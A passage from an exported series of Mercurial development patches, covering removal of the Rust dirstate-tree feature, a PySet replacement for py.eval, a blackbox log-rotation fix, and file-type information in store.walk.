tree.insert_node(HgPath::new(b"foo/a"), removed_entry), - None - ); - // The insert should not turn `foo` into a directory as `foo` is not - // `Removed`. - match tree.get_node(HgPath::new(b"foo")).unwrap().kind { - NodeKind::Directory(_) => panic!("should be a file"), - NodeKind::File(_) => {} - } - - let mut tree = Tree::new(); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - let removed_entry = DirstateEntry { - state: EntryState::Removed, - mode: 10, - mtime: 20, - size: 30, - }; - // The insert *should* turn `foo` into a directory as it is `Removed`. - assert_eq!(tree.insert_node(HgPath::new(b"foo"), removed_entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"foo/a"), entry), None); - match tree.get_node(HgPath::new(b"foo")).unwrap().kind { - NodeKind::Directory(_) => {} - NodeKind::File(_) => panic!("should be a directory"), - } - } - - #[test] - fn test_get() { - let mut tree = Tree::new(); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.get(HgPath::new(b"a/b/c")), Some(&entry)); - assert_eq!(tree.get(HgPath::new(b"a/b")), None); - assert_eq!(tree.get(HgPath::new(b"a")), None); - assert_eq!(tree.get(HgPath::new(b"a/b/c/d")), None); - let entry2 = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 5, - size: 1, - }; - // was_directory - assert_eq!(tree.insert(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get(HgPath::new(b"a/b")), Some(&entry2)); - assert_eq!(tree.get(HgPath::new(b"a/b/c")), Some(&entry)); - - let mut tree = Tree::new(); - - // was_file - assert_eq!(tree.insert_node(HgPath::new(b"a"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.insert_node(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get(HgPath::new(b"a/b")), Some(&entry2)); - } - - #[test] - fn test_get_mut() { - let mut tree = Tree::new(); - let mut entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.get_mut(HgPath::new(b"a/b/c")), Some(&mut entry)); - assert_eq!(tree.get_mut(HgPath::new(b"a/b")), None); - assert_eq!(tree.get_mut(HgPath::new(b"a")), None); - assert_eq!(tree.get_mut(HgPath::new(b"a/b/c/d")), None); - let mut entry2 = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 5, - size: 1, - }; - // was_directory - assert_eq!(tree.insert(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get_mut(HgPath::new(b"a/b")), Some(&mut entry2)); - assert_eq!(tree.get_mut(HgPath::new(b"a/b/c")), Some(&mut entry)); - - let mut tree = Tree::new(); - - // was_file - assert_eq!(tree.insert_node(HgPath::new(b"a"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.insert_node(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get_mut(HgPath::new(b"a/b")), Some(&mut entry2)); - } - - #[test] - fn test_remove() { - let mut tree = Tree::new(); - assert_eq!(tree.files_count, 0); - assert_eq!(tree.remove(HgPath::new(b"foo")), None); - assert_eq!(tree.files_count, 0); - - let entry = DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - - assert_eq!(tree.remove(HgPath::new(b"a/b/c")), Some(entry)); - assert_eq!(tree.files_count, 0); - - assert_eq!(tree.insert_node(HgPath::new(b"a/b/x"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"a/b/y"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"a/b/z"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"x"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"y"), entry), None); - assert_eq!(tree.files_count, 5); - - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(entry)); - assert_eq!(tree.files_count, 4); - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), None); - assert_eq!(tree.files_count, 4); - assert_eq!(tree.remove(HgPath::new(b"a/b/y")), Some(entry)); - assert_eq!(tree.files_count, 3); - assert_eq!(tree.remove(HgPath::new(b"a/b/z")), Some(entry)); - assert_eq!(tree.files_count, 2); - - assert_eq!(tree.remove(HgPath::new(b"x")), Some(entry)); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.remove(HgPath::new(b"y")), Some(entry)); - assert_eq!(tree.files_count, 0); - - // `a` should have been cleaned up, no more files anywhere in its - // descendents - assert_eq!(tree.get_node(HgPath::new(b"a")), None); - assert_eq!(tree.root.children().unwrap().len(), 0); - - let removed_entry = DirstateEntry { - state: EntryState::Removed, - ..entry - }; - assert_eq!(tree.insert(HgPath::new(b"a"), removed_entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"a/b/x"), entry), None); - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a")), Some(removed_entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(entry)); - assert_eq!(tree.files_count, 0); - - // The entire tree should have been cleaned up, no more files anywhere - // in its descendents - assert_eq!(tree.root.children().unwrap().len(), 0); - - let removed_entry = DirstateEntry { - state: EntryState::Removed, - ..entry - }; - assert_eq!(tree.insert(HgPath::new(b"a"), entry), None); - assert_eq!( - tree.insert_node(HgPath::new(b"a/b/x"), removed_entry), - None - ); - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a")), Some(entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(removed_entry)); - assert_eq!(tree.files_count, 0); - - dbg!(&tree); - // The entire tree should have been cleaned up, no more files anywhere - // in its descendents - assert_eq!(tree.root.children().unwrap().len(), 0); - - assert_eq!(tree.insert(HgPath::new(b"d"), entry), None); - assert_eq!(tree.insert(HgPath::new(b"d/d/d"), entry), None); - assert_eq!(tree.files_count, 2); - - // Deleting the nested file should not delete the top directory as it - // used to be a file - assert_eq!(tree.remove(HgPath::new(b"d/d/d")), Some(entry)); - assert_eq!(tree.files_count, 1); - assert!(tree.get_node(HgPath::new(b"d")).is_some()); - assert!(tree.remove(HgPath::new(b"d")).is_some()); - assert_eq!(tree.files_count, 0); - - // Deleting the nested file should not delete the top file (other way - // around from the last case) - assert_eq!(tree.insert(HgPath::new(b"a/a"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.insert(HgPath::new(b"a"), entry), None); - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/a")), Some(entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - assert!(tree.get_node(HgPath::new(b"a")).is_some()); - assert!(tree.get_node(HgPath::new(b"a/a")).is_none()); - } - - #[test] - fn test_was_directory() { - let mut tree = Tree::new(); - - let entry = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - - assert!(tree.insert_node(HgPath::new(b"a"), entry).is_some()); - let new_a = tree.root.children().unwrap().get(&b"a".to_vec()).unwrap(); - - match &new_a.kind { - NodeKind::Directory(_) => panic!(), - NodeKind::File(f) => { - let dir = f.was_directory.clone().unwrap(); - let c = dir - .children - .get(&b"b".to_vec()) - .unwrap() - .children() - .unwrap() - .get(&b"c".to_vec()) - .unwrap(); - - assert_eq!( - match &c.kind { - NodeKind::Directory(_) => panic!(), - NodeKind::File(f) => f.entry, - }, - entry - ); - } - } - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/b/c")), Some(entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - let a = tree.get_node(HgPath::new(b"a")).unwrap(); - match &a.kind { - NodeKind::Directory(_) => panic!(), - NodeKind::File(f) => { - // Directory in `was_directory` was emptied, should be removed - assert_eq!(f.was_directory, None); - } - } - } - #[test] - fn test_extend() { - let insertions = [ - ( - HgPathBuf::from_bytes(b"d"), - DirstateEntry { - state: EntryState::Added, - mode: 0, - mtime: -1, - size: -1, - }, - ), - ( - HgPathBuf::from_bytes(b"b"), - DirstateEntry { - state: EntryState::Normal, - mode: 33188, - mtime: 1599647984, - size: 2, - }, - ), - ( - HgPathBuf::from_bytes(b"a/a"), - DirstateEntry { - state: EntryState::Normal, - mode: 33188, - mtime: 1599647984, - size: 2, - }, - ), - ( - HgPathBuf::from_bytes(b"d/d/d"), - DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - }, - ), - ] - .to_vec(); - let mut tree = Tree::new(); - - tree.extend(insertions.clone().into_iter()); - - for (path, _) in &insertions { - assert!(tree.contains_key(path), true); - } - assert_eq!(tree.files_count, 4); - } -} diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -73,7 +73,6 @@ } /// `now` is the duration in seconds since the Unix epoch -#[cfg(not(feature = "dirstate-tree"))] pub fn pack_dirstate( state_map: &mut StateMap, copy_map: &CopyMap, @@ -146,79 +145,6 @@ Ok(packed) } -/// `now` is the duration in seconds since the Unix epoch -#[cfg(feature = "dirstate-tree")] -pub fn pack_dirstate( - state_map: &mut StateMap, - copy_map: &CopyMap, - parents: DirstateParents, - now: Duration, -) -> Result<Vec<u8>, DirstatePackError> { - // TODO move away from i32 before 2038. - let now: i32 = now.as_secs().try_into().expect("time overflow"); - - let expected_size: usize = state_map - .iter() - .map(|(filename, _)| { - let mut length = MIN_ENTRY_SIZE + filename.len(); - if let Some(copy) = copy_map.get(&filename) { - length += copy.len() + 1; - } - length - }) - .sum(); - let expected_size = expected_size + PARENT_SIZE * 2; - - let mut packed = Vec::with_capacity(expected_size); - let mut new_state_map = vec![]; - - packed.extend(&parents.p1); - packed.extend(&parents.p2); - - for (filename, entry) in state_map.iter() { - let new_filename = filename.to_owned(); - let mut new_mtime: i32 = entry.mtime; - if entry.state == EntryState::Normal && entry.mtime == now { - // The file was last modified "simultaneously" with the current - // write to dirstate (i.e. within the same second for file- - // systems with a granularity of 1 sec). This commonly happens - // for at least a couple of files on 'update'. - // The user could change the file without changing its size - // within the same second. Invalidate the file's mtime in - // dirstate, forcing future 'status' calls to compare the - // contents of the file if the size is the same. This prevents - // mistakenly treating such files as clean. - new_mtime = -1; - new_state_map.push(( - filename.to_owned(), - DirstateEntry { - mtime: new_mtime, - ..entry - }, - )); - } - let mut new_filename = new_filename.into_vec(); - if let Some(copy) = copy_map.get(&filename) { - new_filename.push(b'\0'); - new_filename.extend(copy.bytes()); - } - - packed.write_u8(entry.state.into())?; - packed.write_i32::<BigEndian>(entry.mode)?; - packed.write_i32::<BigEndian>(entry.size)?; - packed.write_i32::<BigEndian>(new_mtime)?; - packed.write_i32::<BigEndian>(new_filename.len() as i32)?; - packed.extend(new_filename) - } - - if packed.len() != expected_size { - return Err(DirstatePackError::BadSize(expected_size, packed.len())); - } - - state_map.extend(new_state_map); - - Ok(packed) -} #[cfg(test)] mod tests { diff --git a/rust/hg-core/src/dirstate/status.rs b/rust/hg-core/src/dirstate/status.rs --- a/rust/hg-core/src/dirstate/status.rs +++ b/rust/hg-core/src/dirstate/status.rs @@ -9,9 +9,6 @@ //! It is currently missing a lot of functionality compared to the Python one //! and will only be triggered in narrow cases. -#[cfg(feature = "dirstate-tree")] -use crate::dirstate::dirstate_tree::iter::StatusShortcut; -#[cfg(not(feature = "dirstate-tree"))] use crate::utils::path_auditor::PathAuditor; use crate::{ dirstate::SIZE_FROM_OTHER_PARENT, @@ -703,83 +700,6 @@ /// /// This takes a mutable reference to the results to account for the /// `extend` in timings - #[cfg(feature = "dirstate-tree")] - #[timed] - pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) { - results.par_extend( - self.dmap - .fs_iter(self.root_dir.clone()) - .par_bridge() - .filter(|(path, _)| self.matcher.matches(path)) - .map(move |(filename, shortcut)| { - let entry = match shortcut { - StatusShortcut::Entry(e) => e, - StatusShortcut::Dispatch(d) => { - return (Cow::Owned(filename), d) - } - }; - let filename_as_path = match hg_path_to_path_buf(&filename) - { - Ok(f) => f, - Err(_) => { - return ( - Cow::Owned(filename), - INVALID_PATH_DISPATCH, - ) - } - }; - let meta = self - .root_dir - .join(filename_as_path) - .symlink_metadata(); - - match meta { - Ok(m) - if !(m.file_type().is_file() - || m.file_type().is_symlink()) => - { - ( - Cow::Owned(filename), - dispatch_missing(entry.state), - ) - } - Ok(m) => { - let dispatch = dispatch_found( - &filename, - entry, - HgMetadata::from_metadata(m), - &self.dmap.copy_map, - self.options, - ); - (Cow::Owned(filename), dispatch) - } - Err(e) - if e.kind() == ErrorKind::NotFound - || e.raw_os_error() == Some(20) => - { - // Rust does not yet have an `ErrorKind` for - // `NotADirectory` (errno 20) - // It happens if the dirstate contains `foo/bar` - // and foo is not a - // directory - ( - Cow::Owned(filename), - dispatch_missing(entry.state), - ) - } - Err(e) => { - (Cow::Owned(filename), dispatch_os_error(&e)) - } - } - }), - ); - } - - /// Add the files in the dirstate to the results. - /// - /// This takes a mutable reference to the results to account for the - /// `extend` in timings - #[cfg(not(feature = "dirstate-tree"))] #[timed] pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) { results.par_extend( @@ -850,7 +770,6 @@ /// /// This takes a mutable reference to the results to account for the /// `extend` in timings - #[cfg(not(feature = "dirstate-tree"))] #[timed] pub fn handle_unknowns(&self, results: &mut Vec<DispatchedPath<'a>>) { let to_visit: Vec<(&HgPath, &DirstateEntry)> = diff --git a/rust/hg-core/src/operations/dirstate_status.rs b/rust/hg-core/src/operations/dirstate_status.rs --- a/rust/hg-core/src/operations/dirstate_status.rs +++ b/rust/hg-core/src/operations/dirstate_status.rs @@ -14,66 +14,6 @@ /// files. pub type LookupAndStatus<'a> = (Vec<HgPathCow<'a>>, DirstateStatus<'a>); -#[cfg(feature = "dirstate-tree")] -impl<'a, M: Matcher + Sync> Status<'a, M> { - pub(crate) fn run(&self) -> Result<LookupAndStatus<'a>, StatusError> { - let (traversed_sender, traversed_receiver) = - crossbeam_channel::unbounded(); - - // Step 1: check the files explicitly mentioned by the user - let (work, mut results) = self.walk_explicit(traversed_sender.clone()); - - // Step 2: Check files in the dirstate - if !self.matcher.is_exact() { - self.extend_from_dmap(&mut results); - } - // Step 3: Check the working directory if listing unknowns - if !work.is_empty() { - // Hashmaps are quite a bit slower to build than vecs, so only - // build it if needed. - let mut old_results = None; - - // Step 2: recursively check the working directory for changes if - // needed - for (dir, dispatch) in work { - match dispatch { - Dispatch::Directory { was_file } => { - if was_file { - results.push((dir.to_owned(), Dispatch::Removed)); - } - if self.options.list_ignored - || self.options.list_unknown - && !self.dir_ignore(&dir) - { - if old_results.is_none() { - old_results = - Some(results.iter().cloned().collect()); - } - self.traverse( - &dir, - old_results - .as_ref() - .expect("old results should exist"), - &mut results, - traversed_sender.clone(), - ); - } - } - _ => { - unreachable!("There can only be directories in `work`") - } - } - } - } - - drop(traversed_sender); - let traversed = traversed_receiver.into_iter().collect(); - - Ok(build_response(results, traversed)) - } -} - -#[cfg(not(feature = "dirstate-tree"))] impl<'a, M: Matcher + Sync> Status<'a, M> { pub(crate) fn run(&self) -> Result<LookupAndStatus<'a>, StatusError> { let (traversed_sender, traversed_receiver) = diff --git a/rust/hg-cpython/Cargo.toml b/rust/hg-cpython/Cargo.toml --- a/rust/hg-cpython/Cargo.toml +++ b/rust/hg-cpython/Cargo.toml @@ -10,7 +10,6 @@ [features] default = ["python27"] -dirstate-tree = ["hg-core/dirstate-tree"] # Features to build an extension module: python27 = ["cpython/python27-sys", "cpython/extension-module-2-7"] diff --git a/rust/hg-cpython/src/dirstate/dirstate_map.rs b/rust/hg-cpython/src/dirstate/dirstate_map.rs --- a/rust/hg-cpython/src/dirstate/dirstate_map.rs +++ b/rust/hg-cpython/src/dirstate/dirstate_map.rs @@ -547,14 +547,12 @@ ) -> Ref<'a, RustDirstateMap> { self.inner(py).borrow() } - #[cfg(not(feature = "dirstate-tree"))] fn translate_key( py: Python, res: (&HgPathBuf, &DirstateEntry), ) -> PyResult<Option<PyBytes>> { Ok(Some(PyBytes::new(py, res.0.as_bytes()))) } - #[cfg(not(feature = "dirstate-tree"))] fn translate_key_value( py: Python, res: (&HgPathBuf, &DirstateEntry), @@ -565,24 +563,6 @@ make_dirstate_tuple(py, &entry)?, ))) } - #[cfg(feature = "dirstate-tree")] - fn translate_key( - py: Python, - res: (HgPathBuf, DirstateEntry), - ) -> PyResult<Option<PyBytes>> { - Ok(Some(PyBytes::new(py, res.0.as_bytes()))) - } - #[cfg(feature = "dirstate-tree")] - fn translate_key_value( - py: Python, - res: (HgPathBuf, DirstateEntry), - ) -> PyResult<Option<(PyBytes, PyObject)>> { - let (f, entry) = res; - Ok(Some(( - PyBytes::new(py, f.as_bytes()), - make_dirstate_tuple(py, &entry)?, - ))) - } } py_shared_iterator!( # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1617885507 -7200 # Thu Apr 08 14:38:27 2021 +0200 # Node ID c6ceb5f27f97ea3cb4d1e01fa811dbd1be3238f1 # Parent 441024b279a635f3bf9bd0e857c8e346abb48d98 rust: Remove use of `py.eval()` The previous Rust code allocated an intermediate `Vec`, converted that to a Python list, then used `eval` to run Python code that converts that list to a Python set. rust-cpython exposes Rust bindings for Python sets, let’s use that instead to construct a set directly. Differential Revision: https://phab.mercurial-scm.org/D10328 diff --git a/rust/hg-cpython/src/dirstate/dirstate_map.rs b/rust/hg-cpython/src/dirstate/dirstate_map.rs --- a/rust/hg-cpython/src/dirstate/dirstate_map.rs +++ b/rust/hg-cpython/src/dirstate/dirstate_map.rs @@ -14,8 +14,8 @@ use cpython::{ exc, ObjectProtocol, PyBool, PyBytes, PyClone, PyDict, PyErr, PyList, - PyObject, PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject, - UnsafePyLeaked, + PyObject, PyResult, PySet, PyString, PyTuple, Python, PythonObject, + ToPyObject, UnsafePyLeaked, }; use crate::{ @@ -175,18 +175,11 @@ let (_, other_parent) = inner_shared.get_non_normal_other_parent_entries(); - let locals = PyDict::new(py); - locals.set_item( - py, - "other_parent", - other_parent - .iter() - .map(|v| PyBytes::new(py, v.as_bytes())) - .collect::<Vec<PyBytes>>() - .to_py_object(py), - )?; - - py.eval("set(other_parent)", None, Some(&locals)) + let set = PySet::empty(py)?; + for path in other_parent.iter() { + set.add(py, PyBytes::new(py, path.as_bytes()))?; + } + Ok(set.into_object()) } def non_normal_entries(&self) -> PyResult<NonNormalEntries> { # HG changeset patch # User Valentin Gatien-Baron <vgatien-baron@janestreet.com> # Date 1617227642 14400 # Wed Mar 31 17:54:02 2021 -0400 # Node ID 4a6024b87dfcc1c325fcb068a7102ae3751832a2 # Parent c6ceb5f27f97ea3cb4d1e01fa811dbd1be3238f1 blackbox: fix type error on log rotation on read-only filesystem Grepping around, the code uses either encoding.strtolocal or stringutil.forcebytestr in this situation. No idea which is best. Differential Revision: https://phab.mercurial-scm.org/D10293 diff --git a/mercurial/loggingutil.py b/mercurial/loggingutil.py --- a/mercurial/loggingutil.py +++ b/mercurial/loggingutil.py @@ -10,7 +10,10 @@ import errno -from . import pycompat +from . import ( + encoding, + pycompat, +) from .utils import ( dateutil, @@ -32,7 +35,7 @@ if err.errno != errno.ENOENT: ui.debug( b"warning: cannot remove '%s': %s\n" - % (newpath, err.strerror) + % (newpath, encoding.strtolocal(err.strerror)) ) try: if newpath: @@ -41,7 +44,7 @@ if err.errno != errno.ENOENT: ui.debug( b"warning: cannot rename '%s' to '%s': %s\n" - % (newpath, oldpath, err.strerror) + % (newpath, oldpath, encoding.strtolocal(err.strerror)) ) if maxsize > 0: diff --git a/tests/test-blackbox.t b/tests/test-blackbox.t --- a/tests/test-blackbox.t +++ b/tests/test-blackbox.t @@ -317,6 +317,17 @@ 1970/01/01 00:00:00 bob @45589e459b2edfbf3dbde7e01f611d2c1e7453d7 (5000)> --debug log -r tip exited 0 after *.?? seconds (glob) 1970/01/01 00:00:00 bob @45589e459b2edfbf3dbde7e01f611d2c1e7453d7 (5000)> blackbox +Skip rotation if the .hg is read-only + +#if unix-permissions + $ chmod -w .hg + $ hg log -r. -T '{rev}\n' --config blackbox.maxsize=1 --debug + warning: cannot rename '$TESTTMP/blackboxtest3/.hg/blackbox.log.1' to '$TESTTMP/blackboxtest3/.hg/blackbox.log': Permission denied + warning: cannot write to blackbox.log: Permission denied + 1 + $ chmod +w .hg +#endif + Test log recursion from dirty status check $ cat > ../r.py <<EOF # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617642171 14400 # Mon Apr 05 13:02:51 2021 -0400 # Node ID 3d32b97590476c2e7657b058788e61169a4059ca # Parent 4a6024b87dfcc1c325fcb068a7102ae3751832a2 contrib: restore the `hg fix` configuration in the examples After decc3bd3f20d, running `black` will DTRT, but running `hg fix` did nothing (unless the example config file was %included, in which case it truncated the file instead of formatting it). I'm not sure why that was happening, but let's not leave a code shredder laying around. Differential Revision: https://phab.mercurial-scm.org/D10311 diff --git a/contrib/examples/fix.hgrc b/contrib/examples/fix.hgrc --- a/contrib/examples/fix.hgrc +++ b/contrib/examples/fix.hgrc @@ -5,7 +5,7 @@ rustfmt:command = rustfmt +nightly rustfmt:pattern = set:"**.rs" - "mercurial/thirdparty/**" -black:command = black +black:command = black --config=pyproject.toml - black:pattern = set:**.py - mercurial/thirdparty/** # Mercurial doesn't have any Go code, but if we did this is how we # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617681294 14400 # Mon Apr 05 23:54:54 2021 -0400 # Node ID fe34c75f62ab302757ae18973ce7736d5f1c00eb # Parent 3d32b97590476c2e7657b058788e61169a4059ca tests: skip test-git-interop.t on Windows Casefolding isn't handled in dirstate yet, triggering a bunch of assertions. But while this is more correctly `no-icasefs`, it's more likely to get attention if someone sees it. I'd just rather not have it adding to the noise on Windows for now. Differential Revision: https://phab.mercurial-scm.org/D10312 diff --git a/tests/test-git-interop.t b/tests/test-git-interop.t --- a/tests/test-git-interop.t +++ b/tests/test-git-interop.t @@ -1,4 +1,4 @@ -#require pygit2 +#require pygit2 no-windows Setup: $ GIT_AUTHOR_NAME='test'; export GIT_AUTHOR_NAME # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617698283 -7200 # Tue Apr 06 10:38:03 2021 +0200 # Node ID 6085b7f1536dbb3e9375907235e6a7a56af6004f # Parent fe34c75f62ab302757ae18973ce7736d5f1c00eb store: also return some information about the type of file `walk` found We start returning of 4th information in the `store.walk` return tuple: the type of the file. This will make it easier for caller to determine which kind of file they are looking at. This should especically help with the `upgrade-repo` code that has to do a lot of fragile index's file name comparison. Differential Revision: https://phab.mercurial-scm.org/D10315 diff --git a/hgext/largefiles/lfutil.py b/hgext/largefiles/lfutil.py --- a/hgext/largefiles/lfutil.py +++ b/hgext/largefiles/lfutil.py @@ -514,7 +514,7 @@ def islfilesrepo(repo): '''Return true if the repo is a largefile repo.''' if b'largefiles' in repo.requirements and any( - shortnameslash in f[0] for f in repo.store.datafiles() + shortnameslash in f[1] for f in repo.store.datafiles() ): return True diff --git a/hgext/largefiles/reposetup.py b/hgext/largefiles/reposetup.py --- a/hgext/largefiles/reposetup.py +++ b/hgext/largefiles/reposetup.py @@ -445,7 +445,7 @@ def checkrequireslfiles(ui, repo, **kwargs): if b'largefiles' not in repo.requirements and any( - lfutil.shortname + b'/' in f[0] for f in repo.store.datafiles() + lfutil.shortname + b'/' in f[1] for f in repo.store.datafiles() ): repo.requirements.add(b'largefiles') scmutil.writereporequirements(repo) diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -276,7 +276,7 @@ repair.strip(ui, unfi, tostrip, topic=b'narrow', backup=backup) todelete = [] - for f, f2, size in repo.store.datafiles(): + for t, f, f2, size in repo.store.datafiles(): if f.startswith(b'data/'): file = f[5:-2] if not newmatch(file): diff --git a/hgext/remotefilelog/contentstore.py b/hgext/remotefilelog/contentstore.py --- a/hgext/remotefilelog/contentstore.py +++ b/hgext/remotefilelog/contentstore.py @@ -365,7 +365,7 @@ ledger.markdataentry(self, treename, node) ledger.markhistoryentry(self, treename, node) - for path, encoded, size in self._store.datafiles(): + for t, path, encoded, size in self._store.datafiles(): if path[:5] != b'meta/' or path[-2:] != b'.i': continue diff --git a/hgext/remotefilelog/remotefilelogserver.py b/hgext/remotefilelog/remotefilelogserver.py --- a/hgext/remotefilelog/remotefilelogserver.py +++ b/hgext/remotefilelog/remotefilelogserver.py @@ -164,24 +164,26 @@ b'.d' ): n = util.pconvert(fp[striplen:]) - yield (store.decodedir(n), n, st.st_size) + d = store.decodedir(n) + t = store.FILETYPE_OTHER + yield (t, d, n, st.st_size) if kind == stat.S_IFDIR: visit.append(fp) if scmutil.istreemanifest(repo): - for (u, e, s) in repo.store.datafiles(): + for (t, u, e, s) in repo.store.datafiles(): if u.startswith(b'meta/') and ( u.endswith(b'.i') or u.endswith(b'.d') ): - yield (u, e, s) + yield (t, u, e, s) # Return .d and .i files that do not match the shallow pattern match = state.match if match and not match.always(): - for (u, e, s) in repo.store.datafiles(): + for (t, u, e, s) in repo.store.datafiles(): f = u[5:-2] # trim data/... and .i/.d if not state.match(f): - yield (u, e, s) + yield (t, u, e, s) for x in repo.store.topfiles(): if state.noflatmf and x[0][:11] == b'00manifest.': diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -428,7 +428,7 @@ if scmutil.istreemanifest(repo): # This logic is safe if treemanifest isn't enabled, but also # pointless, so we skip it if treemanifest isn't enabled. - for unencoded, encoded, size in repo.store.datafiles(): + for t, unencoded, encoded, size in repo.store.datafiles(): if unencoded.startswith(b'meta/') and unencoded.endswith( b'00manifest.i' ): diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -387,13 +387,44 @@ b'requires', ] -REVLOG_FILES_EXT = (b'.i', b'.d', b'.n', b'.nd') +REVLOG_FILES_MAIN_EXT = (b'.i', b'i.tmpcensored') +REVLOG_FILES_OTHER_EXT = (b'.d', b'.n', b'.nd', b'd.tmpcensored') + + +def is_revlog(f, kind, st): + if kind != stat.S_IFREG: + return None + return revlog_type(f) + + +def revlog_type(f): + if f.endswith(REVLOG_FILES_MAIN_EXT): + return FILEFLAGS_REVLOG_MAIN + elif f.endswith(REVLOG_FILES_OTHER_EXT): + return FILETYPE_FILELOG_OTHER -def isrevlog(f, kind, st): - if kind != stat.S_IFREG: - return False - return f.endswith(REVLOG_FILES_EXT) +# the file is part of changelog data +FILEFLAGS_CHANGELOG = 1 << 13 +# the file is part of manifest data +FILEFLAGS_MANIFESTLOG = 1 << 12 +# the file is part of filelog data +FILEFLAGS_FILELOG = 1 << 11 +# file that are not directly part of a revlog +FILEFLAGS_OTHER = 1 << 10 + +# the main entry point for a revlog +FILEFLAGS_REVLOG_MAIN = 1 << 1 +# a secondary file for a revlog +FILEFLAGS_REVLOG_OTHER = 1 << 0 + +FILETYPE_CHANGELOG_MAIN = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_MAIN +FILETYPE_CHANGELOG_OTHER = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_OTHER +FILETYPE_MANIFESTLOG_MAIN = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_MAIN +FILETYPE_MANIFESTLOG_OTHER = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_OTHER +FILETYPE_FILELOG_MAIN = FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_MAIN +FILETYPE_FILELOG_OTHER = FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_OTHER +FILETYPE_OTHER = FILEFLAGS_OTHER class basicstore(object): @@ -425,9 +456,10 @@ p = visit.pop() for f, kind, st in readdir(p, stat=True): fp = p + b'/' + f - if isrevlog(f, kind, st): + rl_type = is_revlog(f, kind, st) + if rl_type is not None: n = util.pconvert(fp[striplen:]) - l.append((decodedir(n), n, st.st_size)) + l.append((rl_type, decodedir(n), n, st.st_size)) elif kind == stat.S_IFDIR and recurse: visit.append(fp) l.sort() @@ -445,16 +477,25 @@ return manifest.manifestlog(self.vfs, repo, rootstore, storenarrowmatch) def datafiles(self, matcher=None): - return self._walk(b'data', True) + self._walk(b'meta', True) + files = self._walk(b'data', True) + self._walk(b'meta', True) + for (t, u, e, s) in files: + yield (FILEFLAGS_FILELOG | t, u, e, s) def topfiles(self): # yield manifest before changelog - return reversed(self._walk(b'', False)) + files = reversed(self._walk(b'', False)) + for (t, u, e, s) in files: + if u.startswith(b'00changelog'): + yield (FILEFLAGS_CHANGELOG | t, u, e, s) + elif u.startswith(b'00manifest'): + yield (FILEFLAGS_MANIFESTLOG | t, u, e, s) + else: + yield (FILETYPE_OTHER | t, u, e, s) def walk(self, matcher=None): """return file related to data storage (ie: revlogs) - yields (unencoded, 